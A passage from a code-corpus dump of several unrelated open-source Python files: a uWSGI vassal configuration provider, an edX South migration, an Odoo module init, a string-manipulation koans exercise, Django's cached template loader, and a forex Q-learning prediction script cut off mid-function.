        path; otherwise falls back to ``<project_home>/uwsgi.d/``.

        :return: Remote config path
        """
        from blues import uwsgi
        destination = uwsgi.blueprint.get('emperor')
        if destination and '*' in destination:
            # Destination can not be wildcard based
            warn('uWsgi emperor vassals dir contains wildcard, skipping')
            destination = None
        if not destination:
            # Join config path and make sure that it ends with a slash
            destination = os.path.join(project_home(), 'uwsgi.d', '')
        with sudo('root'):
            # Ensure destination exists
            debian.mkdir(destination)
        return destination

    def get_context(self):
        """
        Build jinja context for web.ini vassal.

        Derives worker counts and memory limits from the remote host's
        CPU/memory unless overridden in the ``web`` blueprint section.

        :return: context
        """
        from blues import uwsgi
        context = super(UWSGIProvider, self).get_context()
        # Memory optimized options
        cpu_count = blueprint.get('web.max_cores', debian.nproc())
        # total_memory is converted from bytes to whole GB before use.
        total_memory = int(round(debian.total_memory() / 1024.0 / 1024.0 / 1024.0))
        total_memory = blueprint.get('web.max_memory', default=total_memory)
        workers = blueprint.get('web.workers', default=uwsgi.get_worker_count(cpu_count))
        gevent = blueprint.get('web.gevent', default=0)
        info('Generating uWSGI conf based on {} core(s), {} GB memory and {} worker(s)',
             cpu_count, total_memory, workers)
        # TODO: Handle different loop engines (gevent)
        context.update({
            'cpu_affinity': uwsgi.get_cpu_affinity(cpu_count, workers),
            'workers': workers,
            'max_requests': int(uwsgi.get_max_requests(total_memory)),
            'reload_on_as': int(uwsgi.get_reload_on_as(total_memory)),
            'reload_on_rss': int(uwsgi.get_reload_on_rss(total_memory)),
            'limit_as': int(uwsgi.get_limit_as(total_memory)),
            'gevent': gevent,
            'http': blueprint.get('web.http') == 'true',
        })
        # Override context defaults with blueprint settings
        context.update(blueprint.get('web'))
        return context

    def configure_web(self):
        """
        Render and upload web.ini vassal to <project>.ini.

        Falls back to the bundled default template when the project does
        not ship a specific web vassal template.

        :return: Updated vassals
        """
        from blues import uwsgi
        destination = self.get_config_path()
        context = self.get_context()
        ini = self.get_web_vassal()
        template = os.path.join('uwsgi', ini)
        default_templates = uwsgi.blueprint.get_default_template_root()
        with settings(template_dirs=[default_templates]):
            # Check if a specific web vassal have been created or use the default
            if template not in blueprint.get_template_loader().list_templates():
                # Upload default web vassal
                info(indent('...using default web vassal'))
                template = os.path.join('uwsgi', 'default', 'web.ini')
            uploads = blueprint.upload(template, os.path.join(destination, ini), context=context)
            if uploads:
                self.updates.extend(uploads)
        # Upload remaining (local) vassals
        user_vassals = blueprint.upload('uwsgi/', destination, context=context)  # TODO: skip subdirs
        if user_vassals:
            self.updates.extend(user_vassals)
        return self.updates

    def configure_worker(self):
        """
        Render and upload worker vassal(s) to projects uWSGI home dir.

        :return: Updated vassals
        """
        from blues import uwsgi
        # TODO: destination could be global (uwsgi.emperor setting) and therefore contain same vassal names (celery.ini)
        destination = self.get_config_path()
        context = super(UWSGIProvider, self).get_context()
        context.update({
            'workers': blueprint.get('worker.workers', debian.nproc()),
            'queues': blueprint.get('worker.queues'),
        })
        # Override context defaults with blueprint settings
        context.update(blueprint.get('worker'))
        # Upload vassals
        for vassal in self.list_worker_vassals():
            template = os.path.join('uwsgi', 'default', vassal)
            default_templates = uwsgi.blueprint.get_default_template_root()
            with settings(template_dirs=[default_templates]):
                uploads = blueprint.upload(template, destination, context=context)
                self.updates.extend(uploads)
        return self.updates

    def get_web_vassal(self):
        """
        Return file name for web vassal, or None when this host is not a
        configured web host (or the web provider is not uwsgi).

        :return: [project_name].ini
        """
        if not blueprint.get('web.provider') == 'uwsgi':
            return None
        host = env.host_string
        web_hosts = blueprint.get('web', {}).get('hosts', [])
        # An empty hosts list means "all hosts".
        if not web_hosts or host in web_hosts:
            return '{}.ini'.format(blueprint.get('web.name', self.project))

    def list_worker_vassals(self):
        """
        List all valid worker vassals for current host.

        Always includes celery.ini for worker hosts, plus any
        ``worker.extensions`` entries (list form applies everywhere;
        dict form maps extension -> host or '*').

        :return: Set of vassal.ini file names
        """
        vassals = set()
        if not blueprint.get('worker.provider') == 'uwsgi':
            return vassals
        host = env.host_string
        worker_hosts = blueprint.get('worker', {}).get('hosts', [])
        # An empty hosts list means "all hosts".
        if not worker_hosts or host in worker_hosts:
            vassals.add('celery.ini')
            # Filter vassal extensions by host
            extensions = blueprint.get('worker.extensions')
            if isinstance(extensions, list):
                # Filter of bad values
                extensions = [extension for extension in extensions if extension]
                for extension in extensions:
                    vassals.add('{}.ini'.format(extension))
            elif isinstance(extensions, dict):
                for extension, extension_host in extensions.items():
                    if extension_host in ('*', host):
                        vassals.add('{}.ini'.format(extension))
        return vassals

    def list_vassals(self):
        """
        List all valid vassals (web + worker) for current host.

        :return: Set of vassal.ini file names
        """
        vassals = self.list_worker_vassals()
        web_vassal = self.get_web_vassal()
        if web_vassal:
            vassals.add(web_vassal)
        return vassals

    def reload(self, vassals=None):
        """
        Touch reload specified vassals.

        :param vassals: Vassals to reload (defaults to all vassals for
            this host)
        """
        from blues import uwsgi
        for vassal_ini in vassals or self.list_vassals():
            vassal_ini_path = os.path.join(self.get_config_path(), vassal_ini)
            uwsgi.reload(vassal_ini_path)

    def status(self, vassal=None):
        """Show uWSGI status, optionally limited to a single vassal."""
        from blues import uwsgi
        uwsgi.status(vassal)
| mit |
xuxiao19910803/edx-platform | openedx/core/djangoapps/course_groups/migrations/0001_initial.py | 112 | 6691 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models, connection
class Migration(SchemaMigration):
    """Initial south migration for the course_groups app.

    Because the app was converted to south after the tables already
    existed in production, ``forwards`` first checks whether the tables
    and indexes are present and only creates them when missing.
    """

    def forwards(self, orm):
        # Adding model 'CourseUserGroup'

        # Local helpers that introspect the live database so the
        # migration is a no-op on installations that pre-date south.
        def table_exists(name):
            return name in connection.introspection.table_names()

        def index_exists(table_name, column_name):
            return column_name in connection.introspection.get_indexes(connection.cursor(), table_name)

        # Since this djangoapp has been converted to south migrations after-the-fact,
        # these tables/indexes should already exist when migrating an existing installation.
        if not (
            table_exists('course_groups_courseusergroup') and
            index_exists('course_groups_courseusergroup', 'name') and
            index_exists('course_groups_courseusergroup', 'course_id') and
            table_exists('course_groups_courseusergroup_users') and
            index_exists('course_groups_courseusergroup_users', 'courseusergroup_id') and
            index_exists('course_groups_courseusergroup_users', 'user_id')
        ):
            db.create_table('course_groups_courseusergroup', (
                ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
                ('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
                ('course_id', self.gf('xmodule_django.models.CourseKeyField')(max_length=255, db_index=True)),
                ('group_type', self.gf('django.db.models.fields.CharField')(max_length=20)),
            ))
            db.send_create_signal('course_groups', ['CourseUserGroup'])

            # Adding unique constraint on 'CourseUserGroup', fields ['name', 'course_id']
            db.create_unique('course_groups_courseusergroup', ['name', 'course_id'])

            # Adding M2M table for field users on 'CourseUserGroup'
            db.create_table('course_groups_courseusergroup_users', (
                ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
                ('courseusergroup', models.ForeignKey(orm['course_groups.courseusergroup'], null=False)),
                ('user', models.ForeignKey(orm['auth.user'], null=False))
            ))
            db.create_unique('course_groups_courseusergroup_users', ['courseusergroup_id', 'user_id'])

    def backwards(self, orm):
        # NOTE: unlike forwards(), this unconditionally drops the tables.
        # Removing unique constraint on 'CourseUserGroup', fields ['name', 'course_id']
        db.delete_unique('course_groups_courseusergroup', ['name', 'course_id'])

        # Deleting model 'CourseUserGroup'
        db.delete_table('course_groups_courseusergroup')

        # Removing M2M table for field users on 'CourseUserGroup'
        db.delete_table('course_groups_courseusergroup_users')

    # Frozen ORM definitions used by south to reconstruct model state at
    # this point in migration history; generated, do not edit by hand.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'course_groups.courseusergroup': {
            'Meta': {'unique_together': "(('name', 'course_id'),)", 'object_name': 'CourseUserGroup'},
            'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
            'group_type': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'users': ('django.db.models.fields.related.ManyToManyField', [], {'db_index': 'True', 'related_name': "'course_groups'", 'symmetrical': 'False', 'to': "orm['auth.User']"})
        }
    }

    complete_apps = ['course_groups']
| agpl-3.0 |
cgstudiomap/cgstudiomap | main/parts/odoo/addons/sale_order_dates/__init__.py | 441 | 1071 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import sale_order_dates
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
sciurus/python_koans | python3/koans/about_string_manipulation.py | 84 | 2580 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
class AboutStringManipulation(Koan):
    """Koan exercises on string formatting, slicing, splitting and case.

    Each ``__`` is a deliberate blank for the student to fill in so the
    assertion passes; do not replace them with concrete values here.
    """

    def test_use_format_to_interpolate_variables(self):
        value1 = 'one'
        value2 = 2
        string = "The values are {0} and {1}".format(value1, value2)
        self.assertEqual(__, string)

    def test_formatted_values_can_be_shown_in_any_order_or_be_repeated(self):
        value1 = 'doh'
        value2 = 'DOH'
        string = "The values are {1}, {0}, {0} and {1}!".format(value1, value2)
        self.assertEqual(__, string)

    def test_any_python_expression_may_be_interpolated(self):
        import math  # import a standard python module with math functions

        decimal_places = 4
        string = "The square root of 5 is {0:.{1}f}".format(math.sqrt(5),
            decimal_places)
        self.assertEqual(__, string)

    def test_you_can_get_a_substring_from_a_string(self):
        string = "Bacon, lettuce and tomato"
        self.assertEqual(__, string[7:10])

    def test_you_can_get_a_single_character_from_a_string(self):
        string = "Bacon, lettuce and tomato"
        self.assertEqual(__, string[1])

    def test_single_characters_can_be_represented_by_integers(self):
        self.assertEqual(__, ord('a'))
        self.assertEqual(__, ord('b') == (ord('a') + 1))

    def test_strings_can_be_split(self):
        string = "Sausage Egg Cheese"
        words = string.split()
        self.assertListEqual([__, __, __], words)

    def test_strings_can_be_split_with_different_patterns(self):
        import re  # import python regular expression library

        string = "the,rain;in,spain"
        pattern = re.compile(',|;')

        words = pattern.split(string)

        self.assertListEqual([__, __, __, __], words)

        # Pattern is a Python regular expression pattern which matches ',' or ';'

    def test_raw_strings_do_not_interpret_escape_characters(self):
        string = r'\n'
        self.assertNotEqual('\n', string)
        self.assertEqual(__, string)
        self.assertEqual(__, len(string))

        # Useful in regular expressions, file paths, URLs, etc.

    def test_strings_can_be_joined(self):
        words = ["Now", "is", "the", "time"]
        self.assertEqual(__, ' '.join(words))

    def test_strings_can_change_case(self):
        self.assertEqual(__, 'guido'.capitalize())
        self.assertEqual(__, 'guido'.upper())
        self.assertEqual(__, 'TimBot'.lower())
        self.assertEqual(__, 'guido van rossum'.title())
        self.assertEqual(__, 'ToTaLlY aWeSoMe'.swapcase())
| mit |
liangazhou/django-rdp | packages/Django-1.8.6/django/template/loaders/cached.py | 81 | 3052 | """
Wrapper class that takes a list of template loaders as an argument and attempts
to load templates from them in order, caching the result.
"""
import hashlib
from django.template.base import Template, TemplateDoesNotExist
from django.utils.encoding import force_bytes
from .base import Loader as BaseLoader
class Loader(BaseLoader):
    """Template loader that delegates to a list of wrapped loaders and
    caches both the raw lookup results and the compiled templates."""
    is_usable = True

    def __init__(self, engine, loaders):
        # key -> compiled (template, origin) tuple, or TemplateDoesNotExist
        # as a sentinel for a cached failure.
        self.template_cache = {}
        # key -> raw (template, origin) lookup result (pre-compilation).
        self.find_template_cache = {}
        self.loaders = engine.get_template_loaders(loaders)
        super(Loader, self).__init__(engine)

    def cache_key(self, template_name, template_dirs):
        """Build the cache key for a (name, dirs) lookup."""
        if template_dirs:
            # If template directories were specified, use a hash to differentiate
            return '-'.join([template_name, hashlib.sha1(force_bytes('|'.join(template_dirs))).hexdigest()])
        else:
            return template_name

    def find_template(self, name, dirs=None):
        """
        Helper method. Lookup the template :param name: in all the configured loaders
        """
        key = self.cache_key(name, dirs)
        try:
            result = self.find_template_cache[key]
        except KeyError:
            result = None
            # First loader that yields the template wins.
            for loader in self.loaders:
                try:
                    template, display_name = loader(name, dirs)
                except TemplateDoesNotExist:
                    pass
                else:
                    origin = self.engine.make_origin(display_name, loader, name, dirs)
                    result = template, origin
                    break
        # Cache even a failed lookup (result is None) so repeated misses
        # don't hit every loader again.
        self.find_template_cache[key] = result
        if result:
            return result
        else:
            # Remember the failure in the compiled-template cache too.
            self.template_cache[key] = TemplateDoesNotExist
            raise TemplateDoesNotExist(name)

    def load_template(self, template_name, template_dirs=None):
        """Return a cached (template, origin_name) pair, compiling and
        caching the template on first use."""
        key = self.cache_key(template_name, template_dirs)
        template_tuple = self.template_cache.get(key)
        # A cached previous failure:
        if template_tuple is TemplateDoesNotExist:
            raise TemplateDoesNotExist
        elif template_tuple is None:
            template, origin = self.find_template(template_name, template_dirs)
            if not hasattr(template, 'render'):
                try:
                    template = Template(template, origin, template_name, self.engine)
                except TemplateDoesNotExist:
                    # If compiling the template we found raises TemplateDoesNotExist,
                    # back off to returning the source and display name for the template
                    # we were asked to load. This allows for correct identification (later)
                    # of the actual template that does not exist.
                    self.template_cache[key] = (template, origin)
            self.template_cache[key] = (template, None)
        return self.template_cache[key]

    def reset(self):
        "Empty the template cache."
        self.template_cache.clear()
        self.find_template_cache.clear()
| apache-2.0 |
Tjorriemorrie/trading | 14_rf_day_episodes/predict/predict.py | 1 | 17194 | import logging
from os.path import realpath, dirname
import pandas as pd
import numpy as np
import pickle
import argparse
from random import random, choice, shuffle
from pprint import pprint
from sklearn.preprocessing import scale
from time import time, sleep
import operator
import datetime
import calendar
# Currency pairs for which models are trained and predictions produced.
CURRENCIES = [
    'AUDUSD',
    'EURGBP',
    'EURJPY',
    'EURUSD',
    'GBPJPY',
    'GBPUSD',
    'NZDUSD',
    'USDCAD',
    'USDCHF',
    'USDJPY',
]

# Candle intervals in minutes; the hourly interval is currently disabled.
INTERVALS = [
    # '60',
    '1440',
]

# Trade life-cycle actions used as the Q-learning action space.
ACTIONS = [
    'waiting',
    'enter-long',
    'stay-long',
    'exit-long',
    'enter-short',
    'stay-short',
    'exit-short',
    'completed',
]
def main(debug):
    """Predict on the most recent monthly candle group for every currency.

    :param debug: kept for interface compatibility with the CLI entry
        point; the debug-only training loop that used it was dead
        (commented-out) code and has been removed.
    """
    interval = choice(INTERVALS)

    for currency in CURRENCIES:
        df = loadData(currency, interval)
        df = dropOutliers(df)
        df = setGlobalStats(df)

        q = loadQ(currency, interval)

        # Group candles by calendar month and only predict on the latest
        # group.  The groupby is computed once and reused (it was
        # previously built twice per currency).
        monthly = df.groupby(pd.TimeGrouper(freq='M'))
        group_df = monthly.get_group(monthly.last().iloc[-1].name)

        trail = predict(group_df, q)
        logging.warn('{0} [{1}] on {4} [{2}] items => {3}'.format(currency, interval, len(group_df), trail, group_df.iloc[-1].name))
def loadData(currency, interval):
    """Load OHLCV candles for a currency/interval from the data directory.

    Returns a float DataFrame indexed by the combined date+time column.
    Assumes the CSV has no header and columns in the order
    date, time, open, high, low, close, volume — TODO confirm against
    the data files.
    """
    logging.info('Data: loading {0} at {1}...'.format(currency, interval))
    df = pd.read_csv(
        r'{0}/../../data/{1}{2}.csv'.format(realpath(dirname(__file__)), currency, interval),
        names=['date', 'time', 'open', 'high', 'low', 'close', 'volume'],
        # Merge the first two columns (date, time) into a single datetime index.
        parse_dates=[[0, 1]],
        index_col=0,
    ).astype(float)
    logging.info('Data: {0} rows loaded'.format(len(df)))
    return df
def dropOutliers(df):
    """Drop candles whose high-low range lies outside mean +/- 2 std.

    Adds a ``range`` column (high - low) to the frame as a side effect
    and returns the filtered frame.  Rows are kept only when
    ``min_cutoff < range < max_cutoff`` (strict on both sides).
    """
    logging.info('Outliers: dropping...')
    size_start = len(df)

    # get range
    df['range'] = df.high - df.low

    # get stats
    mean = df.range.mean()
    std = df.range.std()

    # drop outliers beyond two standard deviations from the mean
    min_cutoff = mean - std * 2
    max_cutoff = mean + std * 2
    logging.debug('Dropping outliers between below {0:4f} and above {1:4f}'.format(min_cutoff, max_cutoff))

    # Single boolean mask instead of two chained filters.
    df = df[(df.range > min_cutoff) & (df.range < max_cutoff)]
    # BUG FIX: the dropped-row count was previously computed against a
    # hard-coded 500 instead of the actual starting size.
    logging.debug('Dropped {0} rows'.format(size_start - len(df)))

    logging.info('Outliers: {0} removed'.format(size_start - len(df)))
    return df
def setGlobalStats(df):
    """Add boolean indicator columns (moving averages, pivots, ATR) to df.

    All derived columns are boolean/0-1 flags computed from the typical
    price hlc = (high + low + close) / 3 and the true range.
    NOTE(review): pd.rolling_mean was removed in later pandas versions;
    this code assumes an old pandas release — confirm before upgrading.
    """
    logging.info('DF: adding non-state stats...')

    # moving average
    # Typical price per candle.
    hlc = df.apply(lambda x: (x['high'] + x['low'] + x['close']) / 3, axis=1)
    # Fast (5-period) MA: direction, divergence and magnitude flags.
    avg_5 = pd.rolling_mean(hlc, 5)
    avg_5_y = avg_5.shift(+1)
    df['ma_quick_bullish'] = avg_5 >= avg_5_y
    avg_5_diff = abs(avg_5 - avg_5_y)
    avg_5_diff_y = avg_5_diff.shift(+1)
    df['ma_quick_divergence'] = avg_5_diff >= avg_5_diff_y
    df['ma_quick_magnitude'] = avg_5_diff > avg_5_diff.mean()
    # Slow (20-period) MA: same three flags.
    avg_20 = pd.rolling_mean(hlc, 20)
    avg_20_y = avg_20.shift(+1)
    df['ma_signal_bullish'] = avg_20 >= avg_20_y
    avg_20_diff = abs(avg_20 - avg_20_y)
    avg_20_diff_y = avg_20_diff.shift(+1)
    df['ma_signal_divergence'] = avg_20_diff >= avg_20_diff_y
    df['ma_signal_magnitude'] = avg_20_diff > avg_20_diff.mean()
    # Fast/slow crossover flags.
    df['ma_crossover_bullish'] = avg_5 >= avg_20
    ma_diff = avg_5 - avg_20
    ma_diff_y = avg_5_y - avg_20_y
    df['ma_crossover_divergence'] = ma_diff >= ma_diff_y
    df['ma_crossover_magnitude'] = ma_diff >= ma_diff.mean()

    # pivots: hlc and its previous four values side by side.
    df_pivots = pd.DataFrame(dtype=float)
    df_pivots['hlc'] = hlc
    df_pivots['hlc_y1'] = hlc.shift(1)
    df_pivots['hlc_y2'] = hlc.shift(2)
    df_pivots['hlc_y3'] = hlc.shift(3)
    df_pivots['hlc_y4'] = hlc.shift(4)
    # Major pivots need two rising/falling candles on each side of the
    # turning point; minor pivots only one.
    df['pivot_high_major'] = df_pivots.apply(lambda x: 1 if (x['hlc_y4'] < x['hlc_y3'] < x['hlc_y2'] and x['hlc_y2'] > x['hlc_y1'] > x['hlc']) else 0, axis=1)
    df['pivot_high_minor'] = df_pivots.apply(lambda x: 1 if (x['hlc_y2'] < x['hlc_y1'] and x['hlc_y1'] > x['hlc']) else 0, axis=1)
    df['pivot_low_major'] = df_pivots.apply(lambda x: 1 if (x['hlc_y4'] > x['hlc_y3'] > x['hlc_y2'] and x['hlc_y2'] < x['hlc_y1'] < x['hlc']) else 0, axis=1)
    df['pivot_low_minor'] = df_pivots.apply(lambda x: 1 if (x['hlc_y2'] > x['hlc_y1'] and x['hlc_y1'] < x['hlc']) else 0, axis=1)

    # situationals: short-term momentum flags.
    df['higher_high'] = df_pivots.apply(lambda x: 1 if (x['hlc'] > x['hlc_y1']) else 0, axis=1)
    df['lower_low'] = df_pivots.apply(lambda x: 1 if (x['hlc'] < x['hlc_y1']) else 0, axis=1)
    df['higher_soldiers'] = df_pivots.apply(lambda x: 1 if (x['hlc'] > x['hlc_y1'] > x['hlc_y2']) else 0, axis=1)
    df['lower_soldiers'] = df_pivots.apply(lambda x: 1 if (x['hlc'] < x['hlc_y1'] < x['hlc_y2']) else 0, axis=1)

    # ATR: true range = max(range, |high - prev close|, |low - prev close|).
    df_atr = pd.DataFrame(dtype=float)
    df_atr['range'] = df['range']
    df_atr['close_y'] = df['close'].shift(+1)
    df_atr['h_from_c'] = abs(df['high'] - df_atr['close_y'])
    df_atr['l_from_c'] = abs(df['low'] - df_atr['close_y'])
    df_atr['tr'] = df_atr.apply(lambda x: max(x['range'], x['h_from_c'], x['l_from_c']), axis=1)
    # Same fast/slow/crossover flag scheme as the moving averages above.
    avg_5 = pd.rolling_mean(df_atr['tr'], 5)
    avg_5_y = avg_5.shift(+1)
    df['atr_quick_bullish'] = avg_5 >= avg_5_y
    avg_5_diff = abs(avg_5 - avg_5_y)
    avg_5_diff_y = avg_5_diff.shift(+1)
    df['atr_quick_divergence'] = avg_5_diff >= avg_5_diff_y
    df['atr_quick_magnitude'] = avg_5_diff > avg_5_diff.mean()
    avg_20 = pd.rolling_mean(df_atr['tr'], 20)
    avg_20_y = avg_20.shift(+1)
    df['atr_signal_bullish'] = avg_20 >= avg_20_y
    avg_20_diff = abs(avg_20 - avg_20_y)
    avg_20_diff_y = avg_20_diff.shift(+1)
    df['atr_signal_divergence'] = avg_20_diff >= avg_20_diff_y
    df['atr_signal_magnitude'] = avg_20_diff > avg_20_diff.mean()
    df['atr_crossover_bullish'] = avg_5 >= avg_20
    atr_diff = avg_5 - avg_20
    atr_diff_y = avg_5_y - avg_20_y
    df['atr_crossover_divergence'] = atr_diff >= atr_diff_y
    df['atr_crossover_magnitude'] = atr_diff >= atr_diff.mean()

    # print df
    # raise Exception('foo')

    logging.info('DF: added non-state stats')
    return df
def loadQ(currency, interval):
    """Load the pickled Q-table for a currency/interval.

    Returns an empty dict when no saved model exists yet.
    """
    logging.info('Q: loading...')
    model_path = '{0}/models/{1}_{2}.q'.format(realpath(dirname(__file__)), currency, interval)
    try:
        with open(model_path, 'rb') as handle:
            q = pickle.load(handle)
    except IOError:
        # No model trained yet: start from an empty table.
        q = {}
    logging.info('Q: loaded {0}'.format(len(q)))
    return q
def saveQ(currency, interval, q):
    """Pickle the Q-table for a currency/interval to the models directory."""
    logging.info('Q: saving...')
    model_path = '{0}/models/{1}_{2}.q'.format(realpath(dirname(__file__)), currency, interval)
    with open(model_path, 'wb') as handle:
        pickle.dump(q, handle)
    logging.info('Q: saved {0}'.format(len(q)))
def predict(df, q):
    """Walk *df* once, greedily following the learned policy in *q*.

    Returns the trail string, one marker per row:
    '_' waiting, 'B' long, 'S' short, '!' trade closed/finished.
    """
    logging.info('Predicting: started...')
    # get bdays: business days from the first row through month end,
    # used by getState to encode progress through the month
    first_bday = df.index[0]
    first_day = first_bday.replace(day=1)
    last_day = first_day.replace(day=calendar.monthrange(first_bday.year, first_bday.month)[1])
    bdays_days = pd.bdate_range(start=first_bday, end=last_day)
    bdays = len(bdays_days)
    trail = ''
    # initial state
    # NOTE(review): i starts as a float (0.) and is later passed to
    # df.iloc inside getState -- relies on implicit float indexing;
    # verify against the pandas version in use
    i = 0.
    s = getState(df, i, bdays)
    # initial action (epsilon=0: pure exploitation while predicting)
    a = getAction(q, s, 0)
    for date_time, row in df.iterrows():
        logging.info(' ')
        logging.info('Environment: {0}/{1} {2}'.format(i, len(df)-1, date_time))
        logging.info('State: {0}'.format(sum(s)))
        logging.info('Action: {0}'.format(a))
        # take action (get trade status for s_next)
        s_ts, trail = takeAction(s, a, trail)
        # next environment; None state/action marks the terminal row
        i_next = i + 1
        if i_next >= len(df):
            s_next = None
            a_next = None
        else:
            s_next = getState(df, i_next, bdays, s_ts)
            a_next = getAction(q, s_next, 0)
        a = a_next
        s = s_next
        i += 1
    # logging.warn('Trail {0}'.format(trail))
    return trail
########################################################################################################
# WORLD
########################################################################################################
def getState(df, i, bdays, s_ts=None):
    """Build the binary state vector for row *i* of *df*.

    Concatenates: 4-bit one-hot trade status, 25 month-progress buckets,
    9 moving-average flags, 4 pivot flags, 4 situational flags and
    9 average-true-range flags.
    """
    logging.info('State: from {0}...'.format(i))
    s = []
    # trade status (defaults to "looking" when none is carried over)
    if not s_ts:
        s_trade_status = [1, 0, 0, 0]
    else:
        s_trade_status = s_ts
    s += s_trade_status
    logging.debug('State: trade status {0}'.format(s_trade_status))
    # group progress: thermometer encoding of (i+1)/bdays over 25 buckets
    s_group_progress = [1 if (i+1)/bdays > t/25. else 0 for t in xrange(0, 25)]
    s += s_group_progress
    logging.debug('State: group progress {0}'.format(s_group_progress))
    # current row
    row = df.iloc[i]
    # print row
    # trend 5/20 (moving-average indicator flags, coerced to 0/1)
    s_trend = []
    s_trend.append(1 if row['ma_quick_bullish'] else 0)
    s_trend.append(1 if row['ma_quick_divergence'] else 0)
    s_trend.append(1 if row['ma_quick_magnitude'] else 0)
    s_trend.append(1 if row['ma_signal_bullish'] else 0)
    s_trend.append(1 if row['ma_signal_divergence'] else 0)
    s_trend.append(1 if row['ma_signal_magnitude'] else 0)
    s_trend.append(1 if row['ma_crossover_bullish'] else 0)
    s_trend.append(1 if row['ma_crossover_divergence'] else 0)
    s_trend.append(1 if row['ma_crossover_magnitude'] else 0)
    s += s_trend
    logging.debug('State: moving average {0}'.format(s_trend))
    # peaks (already 0/1 in the dataframe)
    s_peaks = [
        row['pivot_high_major'],
        row['pivot_high_minor'],
        row['pivot_low_major'],
        row['pivot_low_minor']
    ]
    s += s_peaks
    logging.debug('State: peaks {0}'.format(s_peaks))
    # situationals (already 0/1 in the dataframe)
    s_situationals = [
        row['higher_high'],
        row['lower_low'],
        row['higher_soldiers'],
        row['lower_soldiers']
    ]
    s += s_situationals
    logging.debug('State: situationals {0}'.format(s_situationals))
    # ATR 5/20 (volatility indicator flags, coerced to 0/1)
    s_atr = []
    s_atr.append(1 if row['atr_quick_bullish'] else 0)
    s_atr.append(1 if row['atr_quick_divergence'] else 0)
    s_atr.append(1 if row['atr_quick_magnitude'] else 0)
    s_atr.append(1 if row['atr_signal_bullish'] else 0)
    s_atr.append(1 if row['atr_signal_divergence'] else 0)
    s_atr.append(1 if row['atr_signal_magnitude'] else 0)
    s_atr.append(1 if row['atr_crossover_bullish'] else 0)
    s_atr.append(1 if row['atr_crossover_divergence'] else 0)
    s_atr.append(1 if row['atr_crossover_magnitude'] else 0)
    s += s_atr
    logging.debug('State: average true range {0}'.format(s_atr))
    logging.info('State: {0}/{1}'.format(sum(s), len(s)))
    return s
def getActionsAvailable(trade_status):
    """Map a one-hot trade-status vector to the list of legal actions."""
    logging.debug('Action: finding available for {0}...'.format(trade_status))
    # validate trade status: exactly one flag may be set
    if sum(trade_status) != 1:
        raise Exception('Invalid trade status')
    # action lists in status order: looking, buying, selling, finished
    action_table = [
        ['waiting', 'enter-long', 'enter-short'],
        ['stay-long', 'exit-long'],
        ['stay-short', 'exit-short'],
        ['completed'],
    ]
    actions_available = None
    for flag, actions in zip(trade_status, action_table):
        if flag:
            actions_available = actions
            break
    if actions_available is None:
        raise Exception('Unknown state {0}'.format(trade_status))
